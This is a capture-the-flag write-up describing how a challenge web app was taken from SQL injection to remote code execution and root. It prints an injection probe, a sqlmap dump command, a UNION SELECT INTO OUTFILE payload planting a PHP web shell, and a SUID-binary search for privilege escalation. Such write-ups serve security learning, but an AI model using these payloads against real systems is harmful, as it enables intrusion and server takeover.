[Efiens CTF 2019 Write Up] From SQL Injection to RCE and Get ROOT!

Tram Ho

1. About Challange

This is CTF award of EFIENS Individual CTF, the team currently ranked 3rd in Vietnam on CTFtime.org , organized by Jeopardy from November 24 to December 1. Among the articles on the Web is a series of 3 articles on SQLi => RCE => Get ROOT .

Through this challange, you will gain more knowledge about the dangers of SQLi, as well as uploading reverse shells to execute commands on victims, as well as about Privilege Escalation in Linux.

The server is currently closed

2. Write up

2.1. SQL Injection

Website allows us to look up information of CSA officer by ID, when we enter the ID, the Website will return us the corresponding value as shown below, with 4 specific columns:

To make sure there are only 4 columns, enter the query:
10" order by 5# : No rows returned => Error => Only 4 columns as above

Predict the backend query:
SELECT id, name, username, email FROM TABLE_NAME WHERE id = $_POST['text']

Although it initially made me inject the query manually and still flag, but in such cases we should still save time by using tools, namely SQLmap:
The command: sudo sqlmap -r sqli.req --dump with sqli.req is the text file containing the request sent to the Web Server

2.2. Remote Code Execution

From SQLi to RCE, especially for websites using LAMP Stack as the website above, you can refer to the video presented at DEFCON here . Images are taken from videos.


From SQLi, we can overwrite a file on the server, in this case I will create a new PHP file with a simple payload inside:
<?php system($_GET["cmd"]); ?> and put it on Web Sever, Payload:

" UNION SELECT 1,2,3,'123 <?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/rce.php'#

After RCE is successful, the only simple task is cat flag.txt

2.3. Get Root

Regarding Privilege Escalation, we have 6 main methods, in this article we will use: Exploiting SUID executables . Detailed article you can refer to here .

In this article, once netcat is successful, I will netcat one more time so I can use a reverse shell based on PHP. That will be easier to manipulate.

List all binaries with SUID permissions: find / -perm -u=s -type f 2>/dev/null

With SUID time we can execute as Root:

The game is easy, coming here just cat flag:

3. Conclusion

This is an open and interesting challange. By finding flags, you can learn a few more things about security and vulnerabilities in the system.

Share the news now

Source : Viblo